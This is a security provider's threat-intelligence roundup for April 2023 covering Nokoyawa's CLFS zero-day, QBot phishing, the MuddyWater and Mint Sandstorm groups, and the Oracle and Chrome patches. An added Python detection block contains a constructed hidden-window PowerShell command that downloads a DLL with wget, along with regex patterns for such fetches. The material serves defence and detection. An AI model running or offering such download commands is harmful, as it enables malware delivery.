Top Middle East Cyber Threats – April 25 2023


At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats.  

In this blog, we share the top cybersecurity threats our MSS team has recently come across. So, read on to learn about what you need to look out for in the weeks ahead:   

Nokoyawa Ransomware Exploits Windows Server Vulnerability

Several attempts to execute closely related elevation-of-privilege exploits on Microsoft Windows servers belonging to small and medium-sized businesses have been detected in the Middle East, North America, and Asia.

These exploits closely resembled already-known Common Log File System (CLFS) driver exploits; among them was a zero-day privilege-escalation exploit for the CLFS driver that supported different versions and builds of Windows, including Windows 11.

The exploit was highly obfuscated with more than 80% of its code being “junk” elegantly compiled into the binary. Microsoft assigned CVE-2023-28252 to the Common Log File System elevation-of-privilege vulnerability, and a patch was released on April 11, 2023, as part of the April Patch Tuesday.

RECOMMENDATIONS

  • Ensure all systems are patched and updated.
  • Avoid clicking or opening untrusted or unknown links, files, or attachments.
  • Don’t allow Macros for unknown MSOffice files.
  • Enable software restriction policies and application whitelisting.
  • Ensure that your email server is configured to block any suspicious attachments.
  • Enforce the Restricted PowerShell script execution policy for end users.
  • Monitor your network for abnormal behaviours and IoCs.
  • Ensure frequent backups are in place.
  • Educate employees about detecting and reporting phishing and suspicious emails.


Fraudulent Business Emails Deliver QBot Malware

A significant increase in attacks using banking Trojans of the QBot family has been observed. The malware is delivered through emails written in several languages, with variants seen in English, German, Italian, and French. The messages are based on real business correspondence that the attackers have gained access to, which lets them join an existing thread with messages of their own. To add authenticity, the attackers place the sender’s name from the earlier messages in the ‘From’ field, but the fraudulent sender address differs from that of the real correspondent.

The QBot delivery chain begins with an email carrying a PDF attachment. The document imitates a Microsoft Office 365 or Microsoft Azure alert and advises the user to click Open to view the attached files. If the user complies, a password-protected archive is downloaded from a compromised site, with the password supplied in the original PDF. The downloaded malicious file runs a PowerShell script on the computer, which uses wget to download the final-stage DLL from a remote server.
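The two distinctive indicators in this delivery chain, as added detection logic that is not part of the advisory or its sources: a reply whose From display name matches a known correspondent while the address does not, and a PowerShell command line that uses wget to fetch a DLL. All correspondents, addresses and command lines below are constructed.

```python
"""Detection helpers for the QBot lure described above (added example).
Check 1: a From display name that matches a known correspondent while the
address does not (thread hijacking). Check 2: a PowerShell command line
fetching a .dll with wget / Invoke-WebRequest. All data is constructed."""
import re
from email.utils import parseaddr

# Constructed: correspondents seen earlier in a legitimate thread.
KNOWN_CORRESPONDENTS = {
    "Maria Rossi": "maria.rossi@example-supplier.invalid",
    "John Smith": "j.smith@example-customer.invalid",
}

def hijacked_sender(from_header: str, known: dict) -> bool:
    """True when the display name is a known correspondent but the
    address is not the one previously seen for that name."""
    name, addr = parseaddr(from_header)
    expected = known.get(name.strip())
    return expected is not None and addr.lower() != expected.lower()

# In PowerShell, wget and iwr are built-in aliases of Invoke-WebRequest.
_PS_HOST = re.compile(r"(?i)(?:^|[\\\s])(?:powershell|pwsh)(?:\.exe)?\b")
_PS_DLL_FETCH = re.compile(
    r"(?i)(?:^|[\s;\"'(])(?:wget|iwr|invoke-webrequest)\b[^\n]*?https?://\S+\.dll\b"
)

def suspicious_powershell(cmdline: str) -> bool:
    """True for a PowerShell command line that downloads a .dll over HTTP(S)."""
    return bool(_PS_HOST.search(cmdline)) and bool(_PS_DLL_FETCH.search(cmdline))

# Constructed sample events, "<source>|<value>": two mail From headers and
# two process command lines; the second of each pair should be flagged.
SAMPLE_EVENTS = [
    "mail|Maria Rossi <maria.rossi@example-supplier.invalid>",
    "mail|Maria Rossi <mrossi@mail-lookalike.invalid>",
    "proc|powershell.exe -c Get-Date",
    "proc|powershell.exe -w hidden -c \"wget http://example.invalid/u/x.dll -OutFile C:\\Users\\Public\\x.dll\"",
]

def scan(events):
    """Return the events that match either check."""
    hits = []
    for ev in events:
        kind, _, value = ev.partition("|")
        if (kind == "mail" and hijacked_sender(value, KNOWN_CORRESPONDENTS)) or \
           (kind == "proc" and suspicious_powershell(value)):
            hits.append(ev)
    return hits
```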

RECOMMENDATIONS

  • Ensure all systems are patched and updated.
  • Avoid clicking or opening untrusted or unknown links, files, or attachments.
  • Don’t allow Macros for unknown MSOffice files.
  • Enable software restriction policies and application whitelisting.
  • Ensure that your email server is configured to block any suspicious attached files.
  • Enforce the Restricted PowerShell script execution policy for end users.
  • Monitor your network for abnormal behaviours and IoCs.
  • Ensure frequent backups are in place.
  • Educate employees about detecting and reporting phishing and suspicious emails.


MuddyWater Hackers Use SimpleHelp for Persistent System Access

MuddyWater continues its time-tested tradition of relying on legitimate remote administration tools to commandeer targeted systems.

While the nation-state group has previously employed ScreenConnect, RemoteUtilities, and Syncro, a new analysis from Group-IB has revealed that it used SimpleHelp remote support software in June 2022. SimpleHelp is a legitimate remote device control and management tool, which the group uses to maintain persistence on victim devices.

MuddyWater has been active since at least 2017 and is believed to be associated with Iran’s Ministry of Intelligence and Security (MOIS). Some of the group’s top targets include Turkey, Pakistan, the U.A.E., Iraq, Israel, Saudi Arabia, Jordan, the U.S., Azerbaijan, and Afghanistan.

RECOMMENDATIONS

  • Ensure all systems are patched and updated.
  • Avoid clicking or opening untrusted or unknown links, files or attachments.
  • Don’t allow Macros for unknown MSOffice files.
  • Enable software restriction policies and application whitelisting.
  • Ensure that your email server is configured to block any suspicious attached files.
  • Enforce the Restricted PowerShell script execution policy for end users.
  • Monitor your network for abnormal behaviours and shared IoCs.
  • Ensure frequent backups are in place.
  • Educate employees about detecting and reporting phishing and suspicious emails.


Mint Sandstorm Exploits Zero-Day Vulnerability

Microsoft has observed that an Iranian nation-state actor (Mint Sandstorm) is weaponizing N-day vulnerabilities in popular enterprise applications and conducting highly targeted phishing campaigns to quickly and successfully access desired environments. The group has also been developing and using custom tooling against selected targets for discovery, persistence, lateral movement within the environment, and theft of the Active Directory database. The threat actor uses SSH tunnelling to connect to C2 servers and deploys custom .NET malware such as Drokbk and Soldier.

Mint Sandstorm is known to pursue targets in both the private and public sectors, including political dissidents, activist leaders, the Defense Industrial Base (DIB), journalists, and employees from multiple government agencies.

RECOMMENDATIONS

  • Ensure all systems are patched and updated.
  • Avoid clicking or opening untrusted or unknown links, files or attachments.
  • Don’t allow Macros for unknown MSOffice and PDF files.
  • Enable software restriction policies and application whitelisting.
  • Ensure that your email server is configured to block any suspicious attached files.
  • Enforce the Restricted PowerShell script execution policy for end users.
  • Monitor your network for abnormal behaviors and shared IoCs.
  • Ensure frequent backups are in place.
  • Educate employees about detecting and reporting phishing / suspicious emails.


Oracle’s April Patch Update Fixes Multiple Vulnerabilities

Oracle has published a security update to address multiple vulnerabilities as part of its Critical Patch Update for April 2023.

The update includes 231 CVEs in 433 new security patches across 142 product families. Of the 433 security patches published, 72 were classified as critical, 194 as high, 156 as medium, and 11 as low in severity. Several of these vulnerabilities can be exploited remotely without authentication. A remote attacker exploiting them may perform unauthorized operations, including unauthorized deletion or falsification of sensitive information.

RECOMMENDATIONS

  • Ensure all systems are patched and updated.


Google Chrome Releases Update to Address Zero-Day Vulnerabilities

Google has published a security update to address multiple vulnerabilities in the Chrome browser that are fixed in Chrome’s latest version (112.0.5615.137/138 for Windows and 112.0.5615.137 for Mac).

The update includes 8 security fixes, 5 of which were contributed by external researchers. Of these 5, four are rated High and one Medium in severity.

One of the CVEs addressed in this update is CVE-2023-2136, described as an integer overflow in Skia. The Skia Graphics Engine, or Skia, is an open-source 2D graphics library written in C++. An integer overflow occurs when an arithmetic operation attempts to produce a numeric value that lies outside the range representable in the available number of digits.

Google is aware that an exploit for CVE-2023-2136 exists in the wild.

RECOMMENDATIONS

  • Ensure all systems are patched and updated.


References:

https://securelist.com/nokoyawa-ransomware-attacks-with-windows-zero-day/109483/

https://securelist.com/qbot-banker-business-correspondence/109535/

https://www.group-ib.com/blog/muddywater-infrastructure/

https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/

https://www.oracle.com/security-alerts/cpuapr2023.html

https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_18.html
